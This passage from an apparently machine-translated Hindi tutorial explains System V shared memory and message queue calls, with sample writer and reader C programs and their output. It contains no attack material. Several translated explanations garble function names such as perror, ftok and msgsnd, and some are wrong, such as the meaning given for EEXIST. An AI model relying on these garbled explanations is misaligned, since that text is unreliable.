  • IPC_STAT- संरचना के प्रत्येक सदस्य के मौजूदा मूल्यों की जानकारी को buf द्वारा बताए गए पारित ढांचे में भेज दिया जाता है। इस कमांड को साझा मेमोरी सेगमेंट को पढ़ने की अनुमति की आवश्यकता होती है।

  • IPC_SET - यूजर आईडी, मालिक की ग्रुप आईडी, अनुमतियां, आदि को संरचना संरचना द्वारा इंगित किया जाता है।

  • IPC_RMID- खंड को नष्ट करने के लिए चिह्नित करता है। अंतिम प्रक्रिया समाप्त होने के बाद ही यह खंड नष्ट हो जाता है।

  • IPC_INFO - buf द्वारा बताई गई संरचना में साझा मेमोरी सीमा और मापदंडों के बारे में जानकारी देता है।

  • SHM_INFO - साझा स्मृति द्वारा भस्म सिस्टम संसाधनों के बारे में जानकारी युक्त एक shm_info संरचना लौटाता है।

तीसरा तर्क, bf, शेम्पिड_ड्स नामक साझा मेमोरी संरचना का एक संकेतक है। इस संरचना के मूल्यों का उपयोग या तो सेट के लिए किया जाएगा या सेमी के अनुसार प्राप्त किया जाएगा।

यह कॉल पारित आदेश के आधार पर मान लौटाता है। IPC_INFO और SHM_INFO या SHM_STAT की सफलता पर साझा मेमोरी सेगमेंट का सूचकांक या पहचानकर्ता या अन्य ऑपरेशन के लिए 0 और विफलता के मामले में -1 रिटर्न करता है। विफलता के कारण को जानने के लिए, गलत चर या गड़बड़ी () फ़ंक्शन के साथ जांचें।

आइए हम निम्नलिखित नमूना कार्यक्रम पर विचार करें।

  • दो प्रक्रियाएँ बनाएँ, एक साझा मेमोरी में लिखने के लिए है (shm_write.c) और दूसरी साझा मेमोरी से पढ़ने के लिए है (shm_read.c)

  • कार्यक्रम साझा मेमोरी में राइटिंग प्रोसेस (shm_write.c) और साझा मेमोरी से रीडिंग प्रोसेस (shm_read.c) पढ़कर लेखन कार्य करता है।

  • साझा मेमोरी में, लेखन प्रक्रिया, आकार 1K (और झंडे) की साझा मेमोरी बनाती है और साझा मेमोरी को संलग्न करती है

  • लेखन प्रक्रिया 1023 बाइट्स में से प्रत्येक से 5 गुना अक्षर को 'ए' से साझा मेमोरी में लिखती है। अंतिम बाइट बफर के अंत का प्रतीक है

  • पढ़ें प्रक्रिया साझा मेमोरी से पढ़ी जाएगी और मानक आउटपुट पर लिखेंगे

  • पढ़ने और लिखने की प्रक्रिया एक साथ की जाती है

  • लेखन के पूरा होने के बाद, लिखित प्रक्रिया अपडेट को साझा मेमोरी में पूरा होने का संकेत देने के लिए अपडेट करती है (स्ट्रक्चर शमसेग में पूर्ण चर के साथ)

  • रीडिंग प्रोसेस साझा मेमोरी से रीडिंग करता है और आउटपुट पर प्रदर्शित करता है जब तक कि इसे लिखने की प्रक्रिया पूरी होने का संकेत नहीं मिलता है (स्ट्रक्चर शेकेल में पूरा वैरिएबल)

  • सरल लूप के लिए कुछ समय के लिए पढ़ने और लिखने की प्रक्रिया करता है और अनंत लूप से बचने और प्रोग्राम को जटिल करने के लिए भी करता है

निम्नलिखित लिखने की प्रक्रिया के लिए कोड है (साझा मेमोरी में लिखना - फ़ाइल: shm_write.c)

/* Filename: shm_write.c */
#include<stdio.h>
#include<sys/ipc.h>
#include<sys/shm.h>
#include<sys/types.h>
#include<string.h>
#include<errno.h>
#include<stdlib.h>
#include<unistd.h>
#include<string.h>

#define BUF_SIZE 1024
#define SHM_KEY 0x1234

struct shmseg {
   int cnt;
   int complete;
   char buf[BUF_SIZE];
};
int fill_buffer(char * bufptr, int size);

int main(int argc, char *argv[]) {
   int shmid, numtimes;
   struct shmseg *shmp;
   char *bufptr;
   int spaceavailable;
   shmid = shmget(SHM_KEY, sizeof(struct shmseg), 0644|IPC_CREAT);
   if (shmid == -1) {
      perror("Shared memory");
      return 1;
   }
   
   // Attach to the segment to get a pointer to it.
   shmp = shmat(shmid, NULL, 0);
   if (shmp == (void *) -1) {
      perror("Shared memory attach");
      return 1;
   }
   
   /* Transfer blocks of data from buffer to shared memory */
   bufptr = shmp->buf;
   spaceavailable = BUF_SIZE;
   for (numtimes = 0; numtimes < 5; numtimes++) {
      shmp->cnt = fill_buffer(bufptr, spaceavailable);
      shmp->complete = 0;
      printf("Writing Process: Shared Memory Write: Wrote %d bytes\n", shmp->cnt);
      bufptr = shmp->buf;
      spaceavailable = BUF_SIZE;
      sleep(3);
   }
   printf("Writing Process: Wrote %d times\n", numtimes);
   shmp->complete = 1;

   if (shmdt(shmp) == -1) {
      perror("shmdt");
      return 1;
   }

   if (shmctl(shmid, IPC_RMID, 0) == -1) {
      perror("shmctl");
      return 1;
   }
   printf("Writing Process: Complete\n");
   return 0;
}

int fill_buffer(char * bufptr, int size) {
   static char ch = 'A';
   int filled_count;
   
   //printf("size is %d\n", size);
   memset(bufptr, ch, size - 1);
   bufptr[size-1] = '\0';
   if (ch > 122)
   ch = 65;
   if ( (ch >= 65) && (ch <= 122) ) {
      if ( (ch >= 91) && (ch <= 96) ) {
         ch = 65;
      }
   }
   filled_count = strlen(bufptr);
   
   //printf("buffer count is: %d\n", filled_count);
   //printf("buffer filled is:%s\n", bufptr);
   ch++;
   return filled_count;
}

संकलन और निष्पादन कदम

Writing Process: Shared Memory Write: Wrote 1023 bytes
Writing Process: Shared Memory Write: Wrote 1023 bytes
Writing Process: Shared Memory Write: Wrote 1023 bytes
Writing Process: Shared Memory Write: Wrote 1023 bytes
Writing Process: Shared Memory Write: Wrote 1023 bytes
Writing Process: Wrote 5 times
Writing Process: Complete

निम्नलिखित पढ़ने की प्रक्रिया के लिए कोड है (साझा मेमोरी से पढ़ना और मानक आउटपुट पर लिखना - फाइल: shm_read.c)

/* Filename: shm_read.c */
#include<stdio.h>
#include<sys/ipc.h>
#include<sys/shm.h>
#include<sys/types.h>
#include<string.h>
#include<errno.h>
#include<stdlib.h>

#define BUF_SIZE 1024
#define SHM_KEY 0x1234

struct shmseg {
   int cnt;
   int complete;
   char buf[BUF_SIZE];
};

int main(int argc, char *argv[]) {
   int shmid;
   struct shmseg *shmp;
   shmid = shmget(SHM_KEY, sizeof(struct shmseg), 0644|IPC_CREAT);
   if (shmid == -1) {
      perror("Shared memory");
      return 1;
   }
   
   // Attach to the segment to get a pointer to it.
   shmp = shmat(shmid, NULL, 0);
   if (shmp == (void *) -1) {
      perror("Shared memory attach");
      return 1;
   }
   
   /* Transfer blocks of data from shared memory to stdout*/
   while (shmp->complete != 1) {
      printf("segment contains : \n\"%s\"\n", shmp->buf);
      if (shmp->cnt == -1) {
         perror("read");
         return 1;
      }
      printf("Reading Process: Shared Memory: Read %d bytes\n", shmp->cnt);
      sleep(3);
   }
   printf("Reading Process: Reading Done, Detaching Shared Memory\n");
   if (shmdt(shmp) == -1) {
      perror("shmdt");
      return 1;
   }
   printf("Reading Process: Complete\n");
   return 0;
}

संकलन और निष्पादन कदम

segment contains :
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
Reading Process: Shared Memory: Read 1023 bytes
segment contains :
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
Reading Process: Shared Memory: Read 1023 bytes
segment contains :
"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
Reading Process: Shared Memory: Read 1023 bytes
segment contains :
"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"
Reading Process: Shared Memory: Read 1023 bytes
segment contains :
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
Reading Process: Shared Memory: Read 1023 bytes
Reading Process: Reading Done, Detaching Shared Memory
Reading Process: Complete

जब हमें पहले से ही साझा मेमोरी है तो हमें संदेश कतारों की आवश्यकता क्यों है? यह कई कारणों से होगा, आइए हम इसे सरलीकरण के लिए कई बिंदुओं में तोड़ने की कोशिश करें -

  • जैसा कि समझा जाता है, एक बार एक प्रक्रिया द्वारा संदेश प्राप्त होने के बाद यह किसी अन्य प्रक्रिया के लिए उपलब्ध नहीं होगा। जबकि साझा मेमोरी में, डेटा एक्सेस करने के लिए कई प्रक्रियाओं के लिए उपलब्ध है।

  • यदि हम छोटे संदेश स्वरूपों के साथ संवाद करना चाहते हैं।

  • साझा मेमोरी डेटा को एक ही समय में संचारित कई प्रक्रियाओं द्वारा सिंक्रोनाइज़ेशन के साथ संरक्षित करने की आवश्यकता होती है।

  • साझा मेमोरी का उपयोग करके लिखने और पढ़ने की आवृत्ति अधिक है, फिर कार्यक्षमता को लागू करना बहुत जटिल होगा। इस तरह के मामलों में उपयोग के संबंध में नहीं।

  • क्या होगा यदि सभी प्रक्रियाओं को साझा मेमोरी तक पहुंचने की आवश्यकता नहीं है, लेकिन बहुत कम प्रक्रियाओं को केवल इसकी आवश्यकता है, यह संदेश कतारों के साथ लागू करना बेहतर होगा।

  • अगर हम अलग-अलग डेटा पैकेट के साथ संवाद करना चाहते हैं, तो प्रक्रिया ए को बी टाइप करने के लिए संदेश टाइप 1, सी टाइप करने के लिए संदेश टाइप 10 और सी टाइप करने के लिए संदेश टाइप 20 भेजा जाता है। इस मामले में, संदेश कतारों के साथ लागू करना सरल है। दिए गए संदेश प्रकार को 1, 10, 20 के रूप में सरल बनाने के लिए, यह या तो 0 या + ve हो सकता है या जैसा कि नीचे चर्चा की गई है।

  • बेशक, संदेश कतार का क्रम FIFO (फर्स्ट इन फर्स्ट आउट) है। कतार में डाला गया पहला संदेश पुनर्प्राप्त करने वाला पहला संदेश है।

साझा मेमोरी या संदेश कतार का उपयोग करना आवेदन की आवश्यकता पर निर्भर करता है और इसका प्रभावी ढंग से उपयोग किया जा सकता है।

संदेश कतारों का उपयोग करते हुए संचार निम्नलिखित तरीकों से हो सकता है -

  • एक प्रक्रिया द्वारा साझा मेमोरी में लिखना और दूसरी मेमोरी द्वारा साझा मेमोरी से पढ़ना। जैसा कि हम जानते हैं, पढ़ना कई प्रक्रियाओं के साथ भी किया जा सकता है।

  • अलग-अलग डेटा पैकेट के साथ एक प्रक्रिया द्वारा साझा मेमोरी में लिखना और संदेश प्रक्रियाओं के अनुसार कई प्रक्रियाओं द्वारा पढ़ना।

संदेश कतारों पर कुछ जानकारी देखने के बाद, अब सिस्टम कॉल (सिस्टम V) के लिए जाँच करने का समय है जो संदेश कतारों का समर्थन करता है।

संदेश कतारों का उपयोग करते हुए संचार करने के लिए, निम्नलिखित कदम हैं -

Step 1 - एक संदेश कतार बनाएं या पहले से मौजूद संदेश कतार (msgget ()) से कनेक्ट करें

Step 2 - संदेश कतार में लिखें (संदेश) ()

Step 3 - संदेश कतार से पढ़ें (msgrcv ())

Step 4 - संदेश कतार पर संदेश संचालन करें (msgctl ())

अब, ऊपर दिए गए कॉल्स पर वाक्य रचना और कुछ जानकारी की जाँच करते हैं।

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>

int msgget(key_t key, int msgflg)

यह सिस्टम कॉल सिस्टम V संदेश कतार बनाता है या आवंटित करता है। निम्नलिखित तर्कों को पारित करने की आवश्यकता है -

  • पहला तर्क, कुंजी, संदेश कतार को पहचानता है। कुंजी या तो एक मनमाना मूल्य हो सकती है या एक जो लाइब्रेरी फंक्शन ftok () से ली जा सकती है।

  • दूसरा तर्क, shmflg, आवश्यक संदेश कतार ध्वज / s निर्दिष्ट करता है जैसे IPC_CREAT (यदि संदेश कतार मौजूद नहीं है) या IPC_EXCL (संदेश कतार बनाने और कॉल विफल होने पर, संदेश कतार पहले से मौजूद है) के साथ उपयोग किया जाता है। साथ ही परमिशन पास करने की जरूरत है।

Note - अनुमतियों के विवरण के लिए पहले के खंड देखें।

यह कॉल सफलता और -1 पर विफलता के मामले में एक मान्य संदेश कतार पहचानकर्ता (संदेश कतार के आगे कॉल के लिए प्रयुक्त) लौटाएगा। विफलता के कारण को जानने के लिए, गलत चर या गड़बड़ी () फ़ंक्शन के साथ जांचें।

इस कॉल के संबंध में विभिन्न त्रुटियां हैं EACCESS (अनुमति अस्वीकृत), EEXIST (कतार पहले से मौजूद नहीं है), ENOENT (कतार मौजूद नहीं है), ENOMEM (कतार बनाने के लिए पर्याप्त मेमोरी नहीं), आदि।

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>

int msgsnd(int msgid, const void *msgp, size_t msgsz, int msgflg)

यह सिस्टम कॉल संदेश कतार (सिस्टम V) में एक संदेश भेजता / अपेंड करता है। निम्नलिखित तर्कों को पारित करने की आवश्यकता है -

  • पहला तर्क, msgstr "संदेश कतार पहचानता है, संदेश कतार पहचानकर्ता। संदेशदाता की सफलता पर पहचानकर्ता का मान प्राप्त होता है ()

  • दूसरा तर्क, msgp, संदेश का पॉइंटर है, जिसे कॉलर को भेजा जाता है, जो निम्न फॉर्म की संरचना में परिभाषित होता है -

struct msgbuf {
   long mtype;
   char mtext[1];
};

चर mtype का उपयोग विभिन्न संदेश प्रकारों के साथ संचार करने के लिए किया जाता है, जिसे msgrcv () कॉल में विस्तार से बताया गया है। चर mtext एक सरणी या अन्य संरचना है जिसका आकार msgsz (सकारात्मक मूल्य) द्वारा निर्दिष्ट किया गया है। यदि mtext फ़ील्ड का उल्लेख नहीं किया गया है, तो इसे शून्य आकार संदेश माना जाता है, जिसकी अनुमति है।

  • तीसरा तर्क, संदेश, संदेश का आकार है (संदेश एक अशक्त चरित्र के साथ समाप्त होना चाहिए)

  • चौथा तर्क, मेसफ्लग, IPC_NOWAIT जैसे कुछ झंडों को इंगित करता है (जब कुँजी या MSG_NOERROR में कोई संदेश नहीं मिलता है, तो संदेश पाठ काटता है, यदि msgsz बाइट्स से अधिक है)

यह कॉल सफलता पर 0 और असफलता के मामले में -1 होगी। विफलता के कारण को जानने के लिए, गलत चर या गड़बड़ी () फ़ंक्शन के साथ जांचें।

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>

int msgrcv(int msgid, const void *msgp, size_t msgsz, long msgtype, int msgflg)

यह सिस्टम कॉल संदेश कतार (सिस्टम V) से संदेश को पुनर्प्राप्त करता है। निम्नलिखित तर्कों को पारित करने की आवश्यकता है -

  • पहला तर्क, msgstr "संदेश कतार पहचानता है, संदेश कतार पहचानकर्ता। संदेशदाता की सफलता पर पहचानकर्ता का मान प्राप्त होता है ()

  • दूसरा तर्क, msgp, कॉल करने वाले से प्राप्त संदेश का सूचक है। इसे निम्न रूप की संरचना में परिभाषित किया गया है -

struct msgbuf {
   long mtype;
   char mtext[1];
};

चर mtype का उपयोग विभिन्न संदेश प्रकारों के साथ संचार करने के लिए किया जाता है। चर mtext एक सरणी या अन्य संरचना है जिसका आकार msgsz (सकारात्मक मूल्य) द्वारा निर्दिष्ट किया गया है। यदि mtext फ़ील्ड का उल्लेख नहीं किया गया है, तो इसे शून्य आकार संदेश माना जाता है, जिसकी अनुमति है।

  • तीसरा तर्क, संदेश, प्राप्त संदेश का आकार है (संदेश एक अशक्त चरित्र के साथ समाप्त होना चाहिए)

  • मुँह तर्क, संदेश, संदेश के प्रकार को इंगित करता है -

    • If msgtype is 0 - कतार में पहला प्राप्त संदेश पढ़ता है

    • If msgtype is +ve - msgtype की कतार में पहला संदेश पढ़ता है (यदि msgtype 10 है, तो केवल टाइप 10 का पहला संदेश पढ़ता है, हालांकि शुरुआत में अन्य प्रकार कतार में हो सकते हैं)

    • If msgtype is –ve - संदेश प्रकार के पूर्ण मान से कम या उसके बराबर के पहले संदेश को पढ़ता है (जैसे, यदि msgtype -5 है, तो यह 5 से कम प्रकार का पहला संदेश पढ़ता है, 1 से 5 तक संदेश प्रकार)

  • पांचवा तर्क, मेसफ्लग, IPC_NOWAIT जैसे कुछ झंडों को इंगित करता है (कतार में कोई संदेश नहीं मिलने पर तुरंत लौटता है या यदि MSG_NOERROR संदेश संदेश को रद्दी कर देता है, यदि msgsz बाइट्स से अधिक है)

यह कॉल वास्तव में सफलता पर mtext सरणी में प्राप्त बाइट्स की संख्या और -1 को विफलता के मामले में लौटाएगा। विफलता के कारण को जानने के लिए, गलत चर या गड़बड़ी () फ़ंक्शन के साथ जांचें।

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>

int msgctl(int msgid, int cmd, struct msqid_ds *buf)

यह सिस्टम कॉल संदेश कतार (सिस्टम V) का नियंत्रण संचालन करता है। निम्नलिखित तर्कों को पारित करने की आवश्यकता है -

  • पहला तर्क, msgstr "संदेश कतार पहचानता है, संदेश कतार पहचानकर्ता। संदेशदाता की सफलता पर पहचानकर्ता का मान प्राप्त होता है ()

  • दूसरा तर्क, cmd, संदेश कतार पर आवश्यक नियंत्रण ऑपरेशन करने के लिए कमांड है। Cmd के लिए मान्य मान हैं -

IPC_STAT- बुफ़ द्वारा बताई गई संरचना को msqid_ds संरचना के प्रत्येक सदस्य के वर्तमान मूल्यों की जानकारी। इस आदेश को संदेश कतार पर पढ़ने की अनुमति की आवश्यकता है।

IPC_SET - संरचना आईडी द्वारा उपयोगकर्ता आईडी, स्वामी की समूह आईडी, अनुमतियों आदि को निर्धारित किया जाता है।

IPC_RMID - संदेश कतार को तुरंत हटा देता है।

IPC_INFO - buf द्वारा बताई गई संरचना में संदेश कतार की सीमाओं और मापदंडों के बारे में जानकारी देता है, जो कि प्रकार संरचना msginfo की है

MSG_INFO - संदेश कतार द्वारा भस्म किए गए सिस्टम संसाधनों के बारे में जानकारी युक्त एक msginfo संरचना लौटाता है।

  • तीसरा तर्क, buf, संदेश ms संरचना का एक संकेतक है, जिसका नाम ms msid_ds है। इस संरचना के मूल्यों का उपयोग या तो सेट के लिए किया जाएगा या सेमी के अनुसार प्राप्त किया जाएगा।

यह कॉल पारित आदेश के आधार पर मान लौटाएगा। IPC_INFO और MSG_INFO या MSG_STAT की सफलता संदेश कतार के सूचकांक या पहचानकर्ता या अन्य संचालन के लिए 0 और विफलता के मामले में -1 लौटाती है। विफलता के कारण को जानने के लिए, गलत चर या गड़बड़ी () फ़ंक्शन के साथ जांचें।

संदेश कतारों के संबंध में बुनियादी जानकारी और सिस्टम कॉल को देखने के बाद, अब एक कार्यक्रम के साथ जांच करने का समय है।

कार्यक्रम को देखने से पहले हमें विवरण देखें -

Step 1 - दो प्रक्रियाएँ बनाएँ, एक संदेश कतार (msgq_send.c) में भेजने के लिए है और दूसरा संदेश कतार से संदेश भेजने के लिए है (msgq_recv.c)

Step 2- फॉक () फ़ंक्शन का उपयोग करके कुंजी बनाना। इसके लिए, शुरुआत में msgq.txt फ़ाइल बनाई जाती है ताकि एक अनूठी कुंजी प्राप्त की जा सके।

Step 3 - भेजने की प्रक्रिया निम्न कार्य करती है।

  • उपयोगकर्ता से स्ट्रिंग इनपुट पढ़ता है

  • नई लाइन हटाता है, अगर यह मौजूद है

  • संदेश कतार में भेजता है

  • इनपुट के अंत तक प्रक्रिया को दोहराता है (CTRL + D)

  • एक बार इनपुट प्राप्त होने के बाद, प्रक्रिया के अंत को सूचित करने के लिए "अंत" संदेश भेजता है

Step 4 - प्राप्त करने की प्रक्रिया में, निम्नलिखित कार्य करता है।

  • कतार से संदेश पढ़ता है
  • आउटपुट प्रदर्शित करता है
  • यदि प्राप्त संदेश "अंत" है, तो प्रक्रिया को समाप्त करता है और बाहर निकालता है

सरल बनाने के लिए, हम इस नमूने के लिए संदेश प्रकार का उपयोग नहीं कर रहे हैं। साथ ही, एक प्रक्रिया कतार में लिख रही है और दूसरी प्रक्रिया कतार से पढ़ रही है। इसे आवश्यकतानुसार बढ़ाया जा सकता है, आदर्श रूप से एक प्रक्रिया कतार में लिखी जाएगी और कई प्रक्रियाएँ कतार से पढ़ी जाएंगी।

अब, प्रक्रिया की जाँच करते हैं (कतार में संदेश भेजना) - फाइल: msgq_send.c

/* Filename: msgq_send.c */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>

